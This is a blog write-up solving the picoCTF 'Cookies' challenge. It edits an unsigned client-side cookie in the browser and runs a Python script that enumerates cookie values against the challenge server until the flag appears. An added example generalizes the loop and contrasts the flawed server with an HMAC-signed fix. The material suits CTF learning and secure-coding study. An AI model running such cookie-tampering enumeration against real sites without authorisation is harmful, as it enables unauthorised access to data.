picoCTF Cookies
In this blogpost I’ll showcase how to solve the picoCTF Cookies challenge.
This challenge is an easy one. All we need is a web browser, and because hackers are lazy people, we'll use a small Python script to automate the boring part.
Reconnaissance
First we need to open the link in the challenge description in our favorite browser:
A web form asks us what kind of cookie we want. But what about the cookies this site stores in our browser? Open the developer tools (F12) and look at the cookie storage for the site.
There is a cookie named 'name' with the value '-1'. Change the value to 1 and reload the page:
Hmm... it seems the kind of cookie shown is selected by this value: the server takes the number straight from the client-controlled cookie and uses it as an index. Try a few other numbers to confirm this.
Automation
As mentioned above, hackers are lazy people, so let's automate the boring stuff with a short Python script:
# import the library for web requests
import requests

# define the url
url = "http://mercury.picoctf.net:27177/"

# iterate over the cookie values
for i in range(30):
    cookies = {'name': str(i)}
    # send the request with the crafted cookie to the server
    r = requests.get(url, cookies=cookies)
    # check if the response contains the string 'flag'
    if 'flag' in r.text.lower():
        # if so, print out the response and stop the script
        print(r.text)
        break
This script iterates the cookie values from 0 to 29 and sends a request with that cookie to the server. If the response from the server contains the string ‘flag’ it prints out the content of the response and stops execution.
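The loop above is the whole technique: the server trusts a number the client chose, so we just try numbers. As an added example (not part of the original write-up and not picoCTF's own code), the version below generalizes it in three ways: the flag is extracted with a picoCTF{...} regex instead of a substring check on 'flag', the HTTP layer is injected so the loop can be run offline against a constructed stand-in for the challenge server, and a hardened stand-in shows why an HMAC-signed cookie defeats the same loop. The flag value, its index, the stand-in servers and the server secret are all constructed for the example; only the loop itself corresponds to the script above.

```python
import hashlib
import hmac
import re
from typing import Callable, Dict, Iterable, Optional, Tuple

# Flags in this challenge family look like picoCTF{...}; anchoring on the
# prefix avoids a false hit on the word "flag" somewhere else in the page.
FLAG_RE = re.compile(r"picoCTF\{[^}]*\}")

Fetcher = Callable[[Dict[str, str]], str]


def extract_flag(body: str) -> Optional[str]:
    """Return the first picoCTF{...} token in a response body, or None."""
    match = FLAG_RE.search(body)
    return match.group(0) if match else None


def enumerate_cookie(fetch: Fetcher, cookie_name: str = "name",
                     candidates: Iterable[int] = range(-1, 30)) -> Optional[Tuple[int, str]]:
    """Send one request per candidate cookie value and stop at the first flag.

    `fetch` is injected so the same loop runs against the live instance
    (see live_fetcher) or against an in-memory stand-in for testing.
    """
    for value in candidates:
        body = fetch({cookie_name: str(value)})
        flag = extract_flag(body)
        if flag is not None:
            return value, flag
    return None


def live_fetcher(url: str) -> Fetcher:
    """Build a fetcher that talks to a real challenge instance over HTTP."""
    import requests  # imported lazily so the rest of the file runs offline

    session = requests.Session()

    def fetch(cookies: Dict[str, str]) -> str:
        response = session.get(url, cookies=cookies, timeout=10)
        return response.text

    return fetch


# --- Constructed stand-in for the challenge server (not the real picoCTF code).
# It uses the client-supplied cookie directly as an index, which is the bug:
# nothing ties the value to a choice the server actually made.
CONSTRUCTED_FLAG = "picoCTF{constructed_example_flag}"
CONSTRUCTED_FLAG_INDEX = 18  # arbitrary; on the real target the loop finds it


def vulnerable_server(cookies: Dict[str, str]) -> str:
    try:
        index = int(cookies.get("name", "-1"))
    except ValueError:
        return "<p>That is not a cookie.</p>"
    if index == CONSTRUCTED_FLAG_INDEX:
        return f"<p><b>Flag</b>: <code>{CONSTRUCTED_FLAG}</code></p>"
    if index < 0:
        return "<p>Tell me what kind of cookie you want.</p>"
    return f"<p>Cookie number {index}.</p>"


# --- Hardened stand-in: the server signs the value it hands out and refuses
# anything it did not sign, so editing the digit in devtools is detected.
SERVER_SECRET = b"assumed-server-side-secret"  # assumption: never sent to the client


def sign_cookie(value: str) -> str:
    mac = hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify_cookie(cookie: str) -> Optional[str]:
    """Return the signed value if the MAC checks out, otherwise None."""
    value, sep, mac = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


def hardened_server(cookies: Dict[str, str]) -> str:
    value = verify_cookie(cookies.get("name", ""))
    if value is None:
        return "<p>Invalid cookie.</p>"
    return vulnerable_server({"name": value})


if __name__ == "__main__":
    # Offline demonstration; swap in live_fetcher("http://mercury.picoctf.net:27177/")
    # to run the identical loop against the real instance.
    print(enumerate_cookie(vulnerable_server))  # finds the constructed flag
    print(enumerate_cookie(hardened_server))    # None: tampered values are rejected
```

The hardened server still stores the index in the cookie; the difference is that a forged value fails `verify_cookie` before it is ever used as an index, which is the property the real challenge lacks.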
Save the script as 'cookies.py' so that you can run it from the command line:
$ python cookies.py
<!DOCTYPE html>
<html lang="en">
<head>
<title>Cookies</title>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
<link href="https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<div class="header">
<nav>
<ul class="nav nav-pills pull-right">
<li role="presentation"><a href="/reset" class="btn btn-link pull-right">Home</a>
</li>
</ul>
</nav>
<h3 class="text-muted">Cookies</h3>
</div>
<div class="jumbotron">
<p class="lead"></p>
<p style="text-align:center; font-size:30px;"><b>Flag</b>: <code>picoCTF{xxxxxxxx}</code></p>
</div>
<footer class="footer">
<p>© PicoCTF</p>
</footer>
</div>
</body>
</html>
I'm sure you'll find the flag in the HTML of the response, but if you are as lazy as I am, pipe the output through grep and it is even simpler (remember: hackers are lazy). The pattern is quoted so the shell does not try to expand the braces, and -o prints only the matching part:
python cookies.py | grep -o 'picoCTF{[^}]*}'
That's it. As promised, this challenge was not too complicated, and you definitely don't have to be a sophisticated genius to solve it.
Please leave a comment on how you liked my write-up of the picoCTF Cookies challenge.